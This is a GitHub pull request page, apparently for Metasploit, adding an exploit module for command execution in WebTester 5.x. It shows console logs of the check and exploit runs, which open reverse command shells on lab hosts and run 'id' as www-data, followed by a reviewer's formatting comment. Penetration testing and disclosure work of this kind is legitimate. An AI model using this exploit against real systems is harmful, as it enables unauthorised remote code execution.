Add WebTester 5.x Command Execution exploit module #2534

Merged
merged 1 commit into from Oct 17, 2013

Projects

None yet

3 participants

@bcoles
Contributor
bcoles commented Oct 17, 2013

Add WebTester 5.x Command Execution exploit module.

Homepage: http://sourceforge.net/projects/webtesteronline/
Tested on: WebTester v5.1.20101016

WebTester 5.x Command Execution exploit module

Check

msf exploit(webtester_exec) > check

[*] 192.168.124.180:80 - Found version: 5.1.20101016
[+] The target is vulnerable.

Run

msf exploit(webtester_exec) > run
[*] Started reverse double handler

[*] 192.168.124.180:80 - Sending payload (539 bytes)...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] 192.168.124.180:80 - Payload sent successfully
[*] Command: echo 9gnSokBtJDgOQ1hA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "9gnSokBtJDgOQ1hA\r\n"
[*] Matching...
[*] A is input...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command shell session 1 opened (192.168.124.180:4444 -> 192.168.124.180:33093) at 2013-10-17 03:20:00 -0400
[*] Command: echo fCm8SMWnLUpfSz5C;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
@jvazquez-r7
Contributor

Thanks @bcoles ! Processing in a while!

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request Oct 17, 2013
jvazquez-r7 Land #2534, @bcoles's exploit for webtester 5 955fc4e
@jvazquez-r7 jvazquez-r7 merged commit 54cf785 into rapid7:master Oct 17, 2013

1 check passed

default The Travis CI build passed
Details
@jvazquez-r7
Contributor

Landed, minor cleanup here: 352eca1

Test result:

msf exploit(webtester_exec) > check

[*] 192.168.172.134:80 - Found version: 5.1.20101016
[+] The target is vulnerable.
msf exploit(webtester_exec) > exploit

[*] 192.168.172.134:80 - Sending payload (523 bytes)...
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] 192.168.172.134:80 - Payload sent successfully
[*] Command: echo pW1ZYmmUYe4XOABJ;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "pW1ZYmmUYe4XOABJ\r\n"
[*] Matching...
[*] B is input...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
i[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.134:57945) at 2013-10-17 09:31:56 -0500
[*] Command: echo NaH1Rb7vErGFmN3K;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "NaH1Rb7vErGFmN3K\r\n"
d
^R
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y

[*] 192.168.172.134 - Command shell session 1 closed.  Reason: User exit

Thanks @bcoles !

@limhoff-r7

'References' excepts its value to be Array<Array<(String, String)>>. (An Array of two element Arrays). This should be ['URL', 'https://sourceforge.net/p/webtesteronline/bugs/3/']. It is being silently ignored on master, but should be fixed.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment